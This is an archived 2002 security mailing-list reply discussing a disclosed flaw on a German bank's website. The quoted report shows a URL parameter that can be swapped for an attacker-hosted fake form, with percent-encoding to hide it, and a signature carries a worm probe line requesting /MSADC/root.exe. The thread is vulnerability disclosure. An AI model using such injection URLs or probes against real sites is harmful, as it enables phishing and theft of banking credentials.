At 12:12 05.04.02 +0200, hnz geeratz[room23] wrote: >hello good evening hnz >I found this security issue on the german hypovereins bank. I'm from Germany and there was a gap like this in the hypovereinsbank site a few months ago. >They are informed vor 3 months ago , still there is nothing changed. >The security hole will allow a atacker to include his own forms in the >website. This will give him an option to collect sensible information. >It is a home bankin system! I think you can call this security hole CSS (cross-site-scripting). At this moment I would like to appeal to the paper of Obscure. http://eyeonsecurity.net/papers/Extended%20HTML%20Form%20Attack.htm The german version is under http://www.code-foundation.de/archiv/form_attack.htm >take a look at this (long) URL: >http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu > >now it is possible to change the >pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu >part to something like pageurl=http://www.evol.org/fake_form.php > >ore try : >http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=http://www.google.de > >so it is possible to include everything in this webpage. >The attacker could obscure the url in a form like: >pageurl=h%74t%70%3A%2Fw%77w%77............ >so the user will not notice that the include form is not from the original >server Yes, you are right. This is a really bad security hole an in my opinion it is negligent to let shit hole open. The Hypovereinsbank is a great bank in Germany. >It opens a port to a new form of social hacking and data grabbing. ACK. I'm very astonished about the negligence of several System Admins. >greetings hnz g Sincerely Dominik Birk -- http://www.code-foundation.de 217.229.69.207 - - [14/Oct/2001:02:29:41 +0200] "GET /MSADC/root.exe?/c+dir Microsoft? Where do you want to surf today?
This archive was generated by hypermail 2b30 : Fri Apr 05 2002 - 14:58:39 PST